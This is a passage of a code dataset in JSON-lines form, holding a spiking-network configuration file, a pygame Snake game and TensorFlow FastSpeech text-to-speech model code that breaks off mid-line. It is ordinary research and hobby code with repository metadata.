'A_plus': 0.1,\n# 'A_minus': 0.1,\n# 'std': 0.5,\n# 'displace': 0.01,\n# 'maxDt': 10.0,\n# 'w_max_mult': 0.05,\n# 'w_min_mult': 0.05,\n# 'conn_dist': 5.0,\n# }\n# cheap attempt to scale the variance for normal-distributed mutation\nATTR_STEPS_BASE = {\n k: ATTR_STEPS_DEVS[k] * ((ATTR_RANGES[k][1] - ATTR_RANGES[k][0]) / 3.14159)\n if len(ATTR_RANGES[k]) > 1 else\n ATTR_STEPS_DEVS[k] * ((ATTR_RANGES[k][0]) / 3.14159)\n for k in ATTR_RANGES\n}\n\nATTR_STEPS = {k: ATTR_STEPS_BASE[k] for k in ATTR_STEPS_BASE}\n\n# for s in ATTRS:\n# if s.startswith('gabor_weight'):\n# ATTR_RANGES[s] = GABOR_WEIGHT_RANGE\n\n\n### Neuron types\nNEURON_CLASS = 'IF_curr_exp'\nGABOR_CLASS = 'IF_curr_exp'\nMUSHROOM_CLASS = 'IF_curr_exp_i' # i\nINH_MUSHROOM_CLASS = 'IF_curr_exp'\nOUTPUT_CLASS = 'IF_curr_exp_i'\nINH_OUTPUT_CLASS = 'IF_curr_exp'\n\n### Neuron configuration\nVTHRESH = -55.0\nBASE_PARAMS = {\n 'cm': 0.1, # nF\n 'v_reset': -70., # mV\n 'v_rest': -65., # mV\n 'tau_m': 10., # ms\n 'tau_refrac': 5., # ms\n 'tau_syn_E': 2., # ms\n 'tau_syn_I': 5., # ms\n 'i_offset': 0.\n}\n\nINH_PARAMS = BASE_PARAMS.copy()\nINH_PARAMS['v_thresh'] = -55.0\nINH_PARAMS['tau_m'] = 16.0\n\ntau_thresh = 30.0\n#tau_thresh = 50.0\nmult_thresh = 1.8\n# mult_thresh = 0.00000000001\nmult_thresh = 1.000000000000000001\n\nGABOR_PARAMS = BASE_PARAMS.copy()\nMUSHROOM_PARAMS = BASE_PARAMS.copy()\nMUSHROOM_PARAMS['v_threshold'] = VTHRESH # mV\nMUSHROOM_PARAMS['v_thresh_adapt'] = MUSHROOM_PARAMS['v_threshold']\nMUSHROOM_PARAMS['tau_threshold'] = tau_thresh\nMUSHROOM_PARAMS['w_threshold'] = mult_thresh\nMUSHROOM_PARAMS['tau_syn_E'] = 5.\nMUSHROOM_PARAMS['tau_syn_I'] = 5.\nMUSHROOM_PARAMS['cm'] = 1.0\nMUSHROOM_PARAMS['tau_m'] = 20.0\n\nINH_MUSHROOM_PARAMS = INH_PARAMS.copy()\nINH_OUTPUT_PARAMS = INH_PARAMS.copy()\nGAIN_CONTROL_PARAMS = BASE_PARAMS.copy()\n\ntau_thresh = 50.0\nmult_thresh = 1.8\nmult_thresh = 1.00000000000000000000001\n\nOUTPUT_PARAMS = BASE_PARAMS.copy()\nOUTPUT_PARAMS['v_threshold'] = VTHRESH # mV\nOUTPUT_PARAMS['v_thresh_adapt'] = OUTPUT_PARAMS['v_threshold']\nOUTPUT_PARAMS['tau_threshold'] = tau_thresh\nOUTPUT_PARAMS['w_threshold'] = mult_thresh\nOUTPUT_PARAMS['tau_syn_E'] = 5.\nOUTPUT_PARAMS['tau_syn_I'] = 5.\nOUTPUT_PARAMS['cm'] = 1.0\nOUTPUT_PARAMS['tau_m'] = 20.0\nOUTPUT_PARAMS['tau_syn_S'] = 5.\n\n\n\n\nRECORD_SPIKES = [\n # 'input',\n # 'gabor',\n# 'gain_control',\n# 'mushroom',\n # 'inh_mushroom',\n 'output',\n # 'inh_output',\n]\nif TEST_MUSHROOM and 'mushroom' not in RECORD_SPIKES:\n RECORD_SPIKES.append('mushroom')\n\nRECORD_WEIGHTS = [\n # 'input to gabor',\n # 'gabor to mushroom',\n # 'input to mushroom',\n# 'mushroom to output'\n]\n\nRECORD_VOLTAGES = [\n 'output',\n# 'gain_control'\n]\n\nSAVE_INITIAL_WEIGHTS = bool(1)\n\n# STDP_MECH = 'STDPMechanism'\n#\n# time_dep = 'SpikePairRule'\n# time_dep_vars = dict(\n# tau_plus = 20.0,\n# tau_minus = 20.0,\n# A_plus = 0.01,\n# A_minus = 0.01,\n# )\n#\n# weight_dep = 'AdditiveWeightDependence'\n# weight_dep_vars = dict(\n# )\n# w_min_mult = 0.0\n# w_max_mult = 1.2\n\nSTDP_MECH = 'MySTDPMechanism'\n\nTIME_DEP = 'MyTemporalDependence'\nTIME_DEP_VARS = {\n \"A_plus\": 0.10,\n \"A_minus\": 0.01,\n \"tau_plus\": 5.0,\n \"tau_plus1\": 5.0,\n \"tau_minus\": 80.0,\n \"max_learn_t\": N_CLASSES * N_SAMPLES * SAMPLE_DT * N_EPOCHS + 1.0,\n}\n\nWEIGHT_DEP = 'MyWeightDependence'\nWEIGHT_DEP_VARS = dict(\n)\nW_MIN_MULT = 0#-2.0\nW_MAX_MULT = 1.2\n\n","repo_name":"chanokin/l2l-omniglot","sub_path":"omnigloter/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"32616188501","text":"#!/usr/bin/python\n\nfrom pygame.locals import *\nfrom random import randint\nimport pygame\nimport time\n \nclass Apple:\n x = 0\n y = 0\n step = 44\n \n def __init__(self,x,y):\n self.x = x * self.step\n self.y = y * self.step\n \n def draw(self, surface, image):\n surface.blit(image,(self.x, self.y)) \n \n \nclass Player:\n x = [0]\n y = [0]\n step = 44\n direction = 0\n length = 3\n \n updateCountMax = 2\n updateCount = 0\n \n def __init__(self, length):\n self.length = length\n for i in range(0,2000):\n self.x.append(-100)\n self.y.append(-100)\n \n # initial positions, no collision.\n self.x[1] = 1*44\n self.x[2] = 2*44\n \n def update(self):\n \n self.updateCount = self.updateCount + 1\n if self.updateCount > self.updateCountMax:\n \n # update previous positions\n for i in range(self.length-1,0,-1):\n self.x[i] = self.x[i-1]\n self.y[i] = self.y[i-1]\n \n # update position of head of snake\n if self.direction == 0:\n self.x[0] = self.x[0] + self.step\n if self.direction == 1:\n self.x[0] = self.x[0] - self.step\n if self.direction == 2:\n self.y[0] = self.y[0] - self.step\n if self.direction == 3:\n self.y[0] = self.y[0] + self.step\n \n self.updateCount = 0\n \n \n def moveRight(self):\n self.direction = 0\n \n def moveLeft(self):\n self.direction = 1\n \n def moveUp(self):\n self.direction = 2\n \n def moveDown(self):\n self.direction = 3 \n \n def draw(self, surface, image):\n for i in range(0,self.length):\n surface.blit(image,(self.x[i],self.y[i])) \n \nclass Game:\n def isCollision(self,x1,y1,x2,y2,bsize):\n if x1 >= x2 and x1 <= x2 + bsize:\n if y1 >= y2 and y1 <= y2 + bsize:\n return True\n return False\n \nclass App:\n \n windowWidth = 800\n windowHeight = 600\n player = 0\n apple = 0\n \n def __init__(self):\n self._running = True\n self._display_surf = None\n self._image_surf = None\n self._apple_surf = None\n self.game = Game()\n\n","repo_name":"rkaggrawal/PythonScripts","sub_path":"python_scripts/bin_old/gameSnake.py","file_name":"gameSnake.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"25894053449","text":"import numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_tts.models import BaseModel\n\n\ndef get_initializer(initializer_range=0.02):\n \"\"\"Creates a `tf.initializers.truncated_normal` with the given range.\n\n Args:\n initializer_range: float, initializer range for stddev.\n\n Returns:\n TruncatedNormal initializer with stddev = `initializer_range`.\n\n \"\"\"\n return tf.keras.initializers.TruncatedNormal(stddev=initializer_range)\n\n\ndef gelu(x):\n \"\"\"Gaussian Error Linear unit.\"\"\"\n cdf = 0.5 * (1.0 + tf.math.erf(x / tf.math.sqrt(2.0)))\n return x * cdf\n\n\ndef gelu_new(x):\n \"\"\"Smoother gaussian Error Linear Unit.\"\"\"\n cdf = 0.5 * (1.0 + tf.tanh((np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))\n return x * cdf\n\n\ndef swish(x):\n \"\"\"Swish activation function.\"\"\"\n return tf.nn.swish(x)\n\n\ndef mish(x):\n return x * tf.math.tanh(tf.math.softplus(x))\n\n\nACT2FN = {\n \"identity\": tf.keras.layers.Activation(\"linear\"),\n \"tanh\": tf.keras.layers.Activation(\"tanh\"),\n \"gelu\": tf.keras.layers.Activation(gelu),\n \"relu\": tf.keras.activations.relu,\n \"swish\": tf.keras.layers.Activation(swish),\n \"gelu_new\": tf.keras.layers.Activation(gelu_new),\n \"mish\": tf.keras.layers.Activation(mish),\n}\n\n\nclass TFEmbedding(tf.keras.layers.Embedding):\n \"\"\"Faster version of embedding.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def call(self, inputs):\n inputs = tf.cast(inputs, tf.int32)\n outputs = tf.gather(self.embeddings, inputs)\n return outputs\n\n\nclass TFFastSpeechEmbeddings(tf.keras.layers.Layer):\n \"\"\"Construct charactor/phoneme/positional/speaker embeddings.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.vocab_size = config.vocab_size\n self.hidden_size = config.encoder_self_attention_params.hidden_size\n self.initializer_range = config.initializer_range\n self.config = config\n\n self.position_embeddings = TFEmbedding(\n config.max_position_embeddings + 1,\n self.hidden_size,\n weights=[\n self._sincos_embedding(\n self.hidden_size, self.config.max_position_embeddings\n )\n ],\n name=\"position_embeddings\",\n trainable=False,\n )\n\n if config.n_speakers > 1:\n self.encoder_speaker_embeddings = TFEmbedding(\n config.n_speakers,\n self.hidden_size,\n embeddings_initializer=get_initializer(self.initializer_range),\n name=\"speaker_embeddings\",\n )\n self.speaker_fc = tf.keras.layers.Dense(\n units=self.hidden_size, name=\"speaker_fc\"\n )\n\n def build(self, input_shape):\n \"\"\"Build shared charactor/phoneme embedding layers.\"\"\"\n with tf.name_scope(\"charactor_embeddings\"):\n self.charactor_embeddings = self.add_weight(\n \"weight\",\n shape=[self.vocab_size, self.hidden_size],\n initializer=get_initializer(self.initializer_range),\n )\n super().build(input_shape)\n\n def call(self, inputs, training=False):\n \"\"\"Get charactor embeddings of inputs.\n\n Args:\n 1. charactor, Tensor (int32) shape [batch_size, length].\n 2. speaker_id, Tensor (int32) shape [batch_size]\n Returns:\n Tensor (float32) shape [batch_size, length, embedding_size].\n\n \"\"\"\n return self._embedding(inputs, training=training)\n\n def _embedding(self, inputs, training=False):\n \"\"\"Applies embedding based on inputs tensor.\"\"\"\n input_ids, speaker_ids = inputs\n\n input_shape = tf.shape(input_ids)\n seq_length = input_shape[1]\n\n position_ids = tf.range(1, seq_length + 1, dtype=tf.int32)[tf.newaxis, :]\n\n # create embeddings\n inputs_embeds = tf.gather(self.charactor_embeddings, input_ids)\n position_embeddings = self.position_embeddings(position_ids)\n\n # sum embedding\n embeddings = inputs_embeds + tf.cast(position_embeddings, inputs_embeds.dtype)\n if self.config.n_speakers > 1:\n speaker_embeddings = self.encoder_speaker_embeddings(speaker_ids)\n speaker_features = tf.math.softplus(self.speaker_fc(speaker_embeddings))\n # extended speaker embeddings\n extended_speaker_features = speaker_features[:, tf.newaxis, :]\n embeddings += extended_speaker_features\n\n return embeddings\n\n def _sincos_embedding(\n self, hidden_size, max_positional_embedding,\n ):\n position_enc = np.array(\n [\n [\n pos / np.power(10000, 2.0 * (i // 2) / hidden_size)\n for i in range(hidden_size)\n ]\n for pos in range(max_positional_embedding + 1)\n ]\n )\n\n position_enc[:, 0::2] = np.sin(position_enc[:, 0::2])\n position_enc[:, 1::2] = np.cos(position_enc[:, 1::2])\n\n # pad embedding.\n position_enc[0] = 0.0\n\n return position_enc\n\n def resize_positional_embeddings(self, new_size):\n self.position_embeddings = TFEmbedding(\n new_size + 1,\n self.hidden_size,\n weights=[self._sincos_embedding(self.hidden_size, new_size)],\n name=\"position_embeddings\",\n trainable=False,\n )\n\n\nclass TFFastSpeechSelfAttention(tf.keras.layers.Layer):\n \"\"\"Self attention module for fastspeech.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n if config.hidden_size % config.num_attention_heads != 0:\n raise ValueError(\n \"The hidden size (%d) is not a multiple of the number of attention \"\n \"heads (%d)\" % (config.hidden_size, config.num_attention_heads)\n )\n self.output_attentions = config.output_attentions\n self.num_attention_heads = config.num_attention_heads\n self.all_head_size = self.num_attention_heads * config.attention_head_size\n\n self.query = tf.keras.layers.Dense(\n self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"query\",\n )\n self.key = tf.keras.layers.Dense(\n self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"key\",\n )\n self.value = tf.keras.layers.Dense(\n self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"value\",\n )\n\n self.dropout = tf.keras.layers.Dropout(config.attention_probs_dropout_prob)\n self.config = config\n\n def transpose_for_scores(self, x, batch_size):\n \"\"\"Transpose to calculate attention scores.\"\"\"\n x = tf.reshape(\n x,\n (batch_size, -1, self.num_attention_heads, self.config.attention_head_size),\n )\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, attention_mask = inputs\n\n batch_size = tf.shape(hidden_states)[0]\n mixed_query_layer = self.query(hidden_states)\n mixed_key_layer = self.key(hidden_states)\n mixed_value_layer = self.value(hidden_states)\n\n query_layer = self.transpose_for_scores(mixed_query_layer, batch_size)\n key_layer = self.transpose_for_scores(mixed_key_layer, batch_size)\n value_layer = self.transpose_for_scores(mixed_value_layer, batch_size)\n\n attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)\n dk = tf.cast(\n tf.shape(key_layer)[-1], attention_scores.dtype\n ) # scale attention_scores\n attention_scores = attention_scores / tf.math.sqrt(dk)\n\n if attention_mask is not None:\n # extended_attention_masks for self attention encoder.\n extended_attention_mask = attention_mask[:, tf.newaxis, tf.newaxis, :]\n extended_attention_mask = tf.cast(\n extended_attention_mask, attention_scores.dtype\n )\n extended_attention_mask = (1.0 - extended_attention_mask) * -1e9\n attention_scores = attention_scores + extended_attention_mask\n\n # Normalize the attention scores to probabilities.\n attention_probs = tf.nn.softmax(attention_scores, axis=-1)\n attention_probs = self.dropout(attention_probs, training=training)\n\n context_layer = tf.matmul(attention_probs, value_layer)\n context_layer = tf.transpose(context_layer, perm=[0, 2, 1, 3])\n context_layer = tf.reshape(context_layer, (batch_size, -1, self.all_head_size))\n\n outputs = (\n (context_layer, attention_probs)\n if self.output_attentions\n else (context_layer,)\n )\n return outputs\n\n\nclass TFFastSpeechSelfOutput(tf.keras.layers.Layer):\n \"\"\"Fastspeech output of self attention module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.dense = tf.keras.layers.Dense(\n config.hidden_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"dense\",\n )\n self.LayerNorm = tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"LayerNorm\"\n )\n self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob)\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, input_tensor = inputs\n\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states, training=training)\n hidden_states = self.LayerNorm(hidden_states + input_tensor)\n return hidden_states\n\n\nclass TFFastSpeechAttention(tf.keras.layers.Layer):\n \"\"\"Fastspeech attention module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.self_attention = TFFastSpeechSelfAttention(config, name=\"self\")\n self.dense_output = TFFastSpeechSelfOutput(config, name=\"output\")\n\n def call(self, inputs, training=False):\n input_tensor, attention_mask = inputs\n\n self_outputs = self.self_attention(\n [input_tensor, attention_mask], training=training\n )\n attention_output = self.dense_output(\n [self_outputs[0], input_tensor], training=training\n )\n masked_attention_output = attention_output * tf.cast(\n tf.expand_dims(attention_mask, 2), dtype=attention_output.dtype\n )\n outputs = (masked_attention_output,) + self_outputs[\n 1:\n ] # add attentions if we output them\n return outputs\n\n\nclass TFFastSpeechIntermediate(tf.keras.layers.Layer):\n \"\"\"Intermediate representation module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.conv1d_1 = tf.keras.layers.Conv1D(\n config.intermediate_size,\n kernel_size=config.intermediate_kernel_size,\n kernel_initializer=get_initializer(config.initializer_range),\n padding=\"same\",\n name=\"conv1d_1\",\n )\n self.conv1d_2 = tf.keras.layers.Conv1D(\n config.hidden_size,\n kernel_size=config.intermediate_kernel_size,\n kernel_initializer=get_initializer(config.initializer_range),\n padding=\"same\",\n name=\"conv1d_2\",\n )\n if isinstance(config.hidden_act, str):\n self.intermediate_act_fn = ACT2FN[config.hidden_act]\n else:\n self.intermediate_act_fn = config.hidden_act\n\n def call(self, inputs):\n \"\"\"Call logic.\"\"\"\n hidden_states, attention_mask = inputs\n\n hidden_states = self.conv1d_1(hidden_states)\n hidden_states = self.intermediate_act_fn(hidden_states)\n hidden_states = self.conv1d_2(hidden_states)\n\n masked_hidden_states = hidden_states * tf.cast(\n tf.expand_dims(attention_mask, 2), dtype=hidden_states.dtype\n )\n return masked_hidden_states\n\n\nclass TFFastSpeechOutput(tf.keras.layers.Layer):\n \"\"\"Output module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.LayerNorm = tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"LayerNorm\"\n )\n self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob)\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, input_tensor = inputs\n\n hidden_states = self.dropout(hidden_states, training=training)\n hidden_states = self.LayerNorm(hidden_states + input_tensor)\n return hidden_states\n\n\nclass TFFastSpeechLayer(tf.keras.layers.Layer):\n \"\"\"Fastspeech module (FFT module on the paper).\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.attention = TFFastSpeechAttention(config, name=\"attention\")\n self.intermediate = TFFastSpeechIntermediate(config, name=\"intermediate\")\n self.bert_output = TFFastSpeechOutput(config, name=\"output\")\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, attention_mask = inputs\n\n attention_outputs = self.attention(\n [hidden_states, attention_mask], training=training\n )\n attention_output = attention_outputs[0]\n intermediate_output = self.intermediate(\n [attention_output, attention_mask], training=training\n )\n layer_output = self.bert_output(\n [intermediate_output, attention_output], training=training\n )\n masked_layer_output = layer_output * tf.cast(\n tf.expand_dims(attention_mask, 2), dtype=layer_output.dtype\n )\n outputs = (masked_layer_output,) + attention_outputs[\n 1:\n ] # add attentions if we output them\n return outputs\n\n\nclass TFFastSpeechEncoder(tf.keras.layers.Layer):\n \"\"\"Fast Speech encoder module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.output_attentions = config.output_attentions\n self.output_hidden_states = config.output_hidden_states\n self.layer = [\n TFFastSpeechLayer(config, name=\"layer_._{}\".format(i))\n for i in range(config.num_hidden_layers)\n ]\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n hidden_states, attention_mask = inputs\n\n all_hidden_states = ()\n all_attentions = ()\n for _, layer_module in enumerate(self.layer):\n if self.output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n layer_outputs = layer_module(\n [hidden_states, attention_mask], training=training\n )\n hidden_states = layer_outputs[0]\n\n if self.output_attentions:\n all_attentions = all_attentions + (layer_outputs[1],)\n\n # Add last layer\n if self.output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n outputs = (hidden_states,)\n if self.output_hidden_states:\n outputs = outputs + (all_hidden_states,)\n if self.output_attentions:\n outputs = outputs + (all_attentions,)\n return outputs # outputs, (hidden states), (attentions)\n\n\nclass TFFastSpeechDecoder(TFFastSpeechEncoder):\n \"\"\"Fast Speech decoder module.\"\"\"\n\n def __init__(self, config, **kwargs):\n self.is_compatible_encoder = kwargs.pop(\"is_compatible_encoder\", True)\n\n super().__init__(config, **kwargs)\n self.config = config\n\n # create decoder positional embedding\n self.decoder_positional_embeddings = TFEmbedding(\n config.max_position_embeddings + 1,\n config.hidden_size,\n weights=[self._sincos_embedding()],\n name=\"position_embeddings\",\n trainable=False,\n )\n\n if self.is_compatible_encoder is False:\n self.project_compatible_decoder = tf.keras.layers.Dense(\n units=config.hidden_size, name=\"project_compatible_decoder\"\n )\n\n if config.n_speakers > 1:\n self.decoder_speaker_embeddings = TFEmbedding(\n config.n_speakers,\n config.hidden_size,\n embeddings_initializer=get_initializer(config.initializer_range),\n name=\"speaker_embeddings\",\n )\n self.speaker_fc = tf.keras.layers.Dense(\n units=config.hidden_size, name=\"speaker_fc\"\n )\n\n def call(self, inputs, training=False):\n hidden_states, speaker_ids, encoder_mask, decoder_pos = inputs\n\n if self.is_compatible_encoder is False:\n hidden_states = self.project_compatible_decoder(hidden_states)\n\n # calculate new hidden states.\n hidden_states += tf.cast(\n self.decoder_positional_embeddings(decoder_pos), hidden_states.dtype\n )\n\n if self.config.n_speakers > 1:\n speaker_embeddings = self.decoder_speaker_embeddings(speaker_ids)\n speaker_features = tf.math.softplus(self.speaker_fc(speaker_embeddings))\n # extended speaker embeddings\n extended_speaker_features = speaker_features[:, tf.newaxis, :]\n hidden_states += extended_speaker_features\n\n return super().call([hidden_states, encoder_mask], training=training)\n\n def _sincos_embedding(self):\n position_enc = np.array(\n [\n [\n pos / np.power(10000, 2.0 * (i // 2) / self.config.hidden_size)\n for i in range(self.config.hidden_size)\n ]\n for pos in range(self.config.max_position_embeddings + 1)\n ]\n )\n\n position_enc[:, 0::2] = np.sin(position_enc[:, 0::2])\n position_enc[:, 1::2] = np.cos(position_enc[:, 1::2])\n\n # pad embedding.\n position_enc[0] = 0.0\n\n return position_enc\n\n\nclass TFTacotronPostnet(tf.keras.layers.Layer):\n \"\"\"Tacotron-2 postnet.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.conv_batch_norm = []\n for i in range(config.n_conv_postnet):\n conv = tf.keras.layers.Conv1D(\n filters=config.postnet_conv_filters\n if i < config.n_conv_postnet - 1\n else config.num_mels,\n kernel_size=config.postnet_conv_kernel_sizes,\n padding=\"same\",\n name=\"conv_._{}\".format(i),\n )\n batch_norm = tf.keras.layers.BatchNormalization(\n axis=-1, name=\"batch_norm_._{}\".format(i)\n )\n self.conv_batch_norm.append((conv, batch_norm))\n self.dropout = tf.keras.layers.Dropout(\n rate=config.postnet_dropout_rate, name=\"dropout\"\n )\n self.activation = [tf.nn.tanh] * (config.n_conv_postnet - 1) + [tf.identity]\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n outputs, mask = inputs\n extended_mask = tf.cast(tf.expand_dims(mask, axis=2), outputs.dtype)\n for i, (conv, bn) in enumerate(self.conv_batch_norm):\n outputs = conv(outputs)\n outputs = bn(outputs)\n outputs = self.activation[i](outputs)\n outputs = self.dropout(outputs, training=training)\n return outputs * extended_mask\n\n\nclass TFFastSpeechDurationPredictor(tf.keras.layers.Layer):\n \"\"\"FastSpeech duration predictor module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n super().__init__(**kwargs)\n self.conv_layers = []\n for i in range(config.num_duration_conv_layers):\n self.conv_layers.append(\n tf.keras.layers.Conv1D(\n config.duration_predictor_filters,\n config.duration_predictor_kernel_sizes,\n padding=\"same\",\n name=\"conv_._{}\".format(i),\n )\n )\n self.conv_layers.append(\n tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"LayerNorm_._{}\".format(i)\n )\n )\n self.conv_layers.append(tf.keras.layers.Activation(tf.nn.relu6))\n self.conv_layers.append(\n tf.keras.layers.Dropout(config.duration_predictor_dropout_probs)\n )\n self.conv_layers_sequence = tf.keras.Sequential(self.conv_layers)\n self.output_layer = tf.keras.layers.Dense(1)\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\"\"\"\n encoder_hidden_states, attention_mask = inputs\n attention_mask = tf.cast(\n tf.expand_dims(attention_mask, 2), encoder_hidden_states.dtype\n )\n\n # mask encoder hidden states\n masked_encoder_hidden_states = encoder_hidden_states * attention_mask\n\n # pass though first layer\n outputs = self.conv_layers_sequence(masked_encoder_hidden_states)\n outputs = self.output_layer(outputs)\n masked_outputs = outputs * attention_mask\n return tf.squeeze(tf.nn.relu6(masked_outputs), -1) # make sure positive value.\n\n\nclass TFFastSpeechLengthRegulator(tf.keras.layers.Layer):\n \"\"\"FastSpeech lengthregulator module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init variables.\"\"\"\n self.enable_tflite_convertible = kwargs.pop(\"enable_tflite_convertible\", False)\n super().__init__(**kwargs)\n self.config = config\n\n def call(self, inputs, training=False):\n \"\"\"Call logic.\n Args:\n 1. encoder_hidden_states, Tensor (float32) shape [batch_size, length, hidden_size]\n 2. durations_gt, Tensor (float32/int32) shape [batch_size, length]\n \"\"\"\n encoder_hidden_states, durations_gt = inputs\n outputs, encoder_masks = self._length_regulator(\n encoder_hidden_states, durations_gt\n )\n return outputs, encoder_masks\n\n def _length_regulator(self, encoder_hidden_states, durations_gt):\n \"\"\"Length regulator logic.\"\"\"\n sum_durations = tf.reduce_sum(durations_gt, axis=-1) # [batch_size]\n max_durations = tf.reduce_max(sum_durations)\n\n input_shape = tf.shape(encoder_hidden_states)\n batch_size = input_shape[0]\n hidden_size = input_shape[-1]\n\n # initialize output hidden states and encoder masking.\n if self.enable_tflite_convertible:\n # There is only 1 batch in inference, so we don't have to use\n # `tf.While` op with 3-D output tensor.\n repeats = durations_gt[0]\n real_length = tf.reduce_sum(repeats)\n pad_size = max_durations - real_length\n # masks : [max_durations]\n masks = tf.sequence_mask([real_length], max_durations, dtype=tf.int32)\n repeat_encoder_hidden_states = tf.repeat(\n encoder_hidden_states[0], repeats=repeats, axis=0\n )\n repeat_encoder_hidden_states = tf.expand_dims(\n tf.pad(repeat_encoder_hidden_states, [[0, pad_size], [0, 0]]), 0\n ) # [1, max_durations, hidden_size]\n\n outputs = repeat_encoder_hidden_states\n encoder_masks = masks\n else:\n outputs = tf.zeros(\n shape=[0, max_durations, hidden_size], dtype=encoder_hidden_states.dtype\n )\n encoder_masks = tf.zeros(shape=[0, max_durations], dtype=tf.int32)\n\n def condition(\n i,\n batch_size,\n outputs,\n encoder_masks,\n encoder_hidden_states,\n durations_gt,\n max_durations,\n ):\n return tf.less(i, batch_size)\n\n def body(\n i,\n batch_size,\n outputs,\n encoder_masks,\n encoder_hidden_states,\n durations_gt,\n max_durations,\n ):\n repeats = durations_gt[i]\n real_length = tf.reduce_sum(repeats)\n pad_size = max_durations - real_length\n masks = tf.sequence_mask([real_length], max_durations, dtype=tf.int32)\n repeat_encoder_hidden_states = tf.repeat(\n encoder_hidden_states[i], repeats=repeats, axis=0\n )\n repeat_encoder_hidden_states = tf.expand_dims(\n tf.pad(repeat_encoder_hidden_states, [[0, pad_size], [0, 0]]), 0\n ) # [1, max_durations, hidden_size]\n outputs = tf.concat([outputs, repeat_encoder_hidden_states], axis=0)\n encoder_masks = tf.concat([encoder_masks, masks], axis=0)\n return [\n i + 1,\n batch_size,\n outputs,\n encoder_masks,\n encoder_hidden_states,\n durations_gt,\n max_durations,\n ]\n\n # initialize iteration i.\n i = tf.constant(0, dtype=tf.int32)\n _, _, outputs, encoder_masks, _, _, _, = tf.while_loop(\n condition,\n body,\n [\n i,\n batch_size,\n outputs,\n encoder_masks,\n encoder_hidden_states,\n durations_gt,\n max_durations,\n ],\n shape_invariants=[\n i.get_shape(),\n batch_size.get_shape(),\n tf.TensorShape(\n [\n None,\n None,\n self.config.encoder_self_attention_params.hidden_size,\n ]\n ),\n tf.TensorShape([None, None]),\n encoder_hidden_states.get_shape(),\n durations_gt.get_shape(),\n max_durations.get_shape(),\n ],\n )\n\n return outputs, encoder_masks\n\n\nclass TFFastSpeech(BaseModel):\n \"\"\"TF Fastspeech module.\"\"\"\n\n def __init__(self, config, **kwargs):\n \"\"\"Init layers for fastspeech.\"\"\"\n self.enable_tflite_convertible = kwargs.pop(\"enable_tflite_convertible\", False)\n super().__init__(**kwargs)\n self.embeddings = TFFastSpeechEmbeddings(config, name=\"embeddings\")\n self.encoder = TFFastSpeechEncoder(\n config.encoder_self_attention_params, name=\"encoder\"\n )\n self.duration_predictor = TFFastSpeechDurationPredictor(\n config, dtype=tf.float32, name=\"duration_predictor\"\n )\n self.length_regulator = TFFastSpeechLengthRegulator(\n config,\n enable_tflite_convertible=self.enable_tflite_convertible,\n name=\"length_regulator\",\n )\n self.decoder = TFFastSpeechDecoder(\n config.decoder_self_attention_params,\n is_compatible_encoder=config.encoder_self_attention_params.hidden_size\n == config.decoder_self_attention_params.hidden_size,\n name=\"decoder\",\n )\n self.mel_dense = tf.keras.layers.Dense(\n units=config.num_mels, dtype=tf.float32, name=\"mel_before\"\n )\n self.postnet = TFTacotronPostnet(\n config=config, dtype=tf.float32, name=\"postnet\"\n )\n\n self.setup_inference_fn()\n\n def _build(self):\n \"\"\"Dummy input for building model.\"\"\"\n # fake inputs\n input_ids = tf.convert_to_tensor([[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]], tf.int32)\n speaker_ids = tf.convert_to_tensor([0], tf.int32)\n duration_gts = tf.convert_to_tensor([[1, 1, 1, 1, 